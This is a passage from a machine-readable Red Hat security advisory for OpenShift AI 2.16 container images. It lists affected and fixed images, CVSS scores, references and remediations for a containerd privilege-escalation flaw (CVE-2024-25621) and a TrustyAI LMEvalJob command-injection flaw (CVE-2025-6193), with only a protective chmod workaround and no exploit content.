{
"category": "external",
"summary": "RHBZ#2413190",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2413190"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-25621",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25621"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-25621",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25621"
},
{
"category": "external",
"summary": "https://github.com/containerd/containerd/blob/main/docs/rootless.md",
"url": "https://github.com/containerd/containerd/blob/main/docs/rootless.md"
},
{
"category": "external",
"summary": "https://github.com/containerd/containerd/commit/7c59e8e9e970d38061a77b586b23655c352bfec5",
"url": "https://github.com/containerd/containerd/commit/7c59e8e9e970d38061a77b586b23655c352bfec5"
},
{
"category": "external",
"summary": "https://github.com/containerd/containerd/security/advisories/GHSA-pwhc-rpq9-4c8w",
"url": "https://github.com/containerd/containerd/security/advisories/GHSA-pwhc-rpq9-4c8w"
}
],
"release_date": "2025-11-06T18:36:21.566000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "The system administrator on the host can manually chmod the directories to not\nhave group or world accessible permissions:\n```\nchmod 700 /var/lib/containerd\nchmod 700 /run/containerd/io.containerd.grpc.v1.cri\nchmod 700 /run/containerd/io.containerd.sandbox.controller.v1.shim\n```\nAn alternative mitigation would be to run containerd in rootless mode.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/containerd/containerd: containerd local privilege escalation"
},
{
"cve": "CVE-2025-6193",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2025-06-20T14:05:07.010000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2374032"
}
],
"notes": [
{
"category": "description",
"text": "A command injection vulnerability was discovered in the TrustyAI Explainability toolkit. Arbitrary commands placed in certain fields of a LMEValJob custom resource (CR) may be executed in the LMEvalJob pod\u0027s terminal. This issue can be exploited via a maliciously crafted LMEvalJob by a user with permissions to deploy a CR.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "trustyai-explainability: command injection via LMEvalJob CR",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-6193"
},
{
"category": "external",
"summary": "RHBZ#2374032",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2374032"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-6193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6193"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-6193",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6193"
},
{
"category": "external",
"summary": "https://github.com/trustyai-explainability/trustyai-service-operator/pull/504",
"url": "https://github.com/trustyai-explainability/trustyai-service-operator/pull/504"
}
],
"release_date": "2025-06-20T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
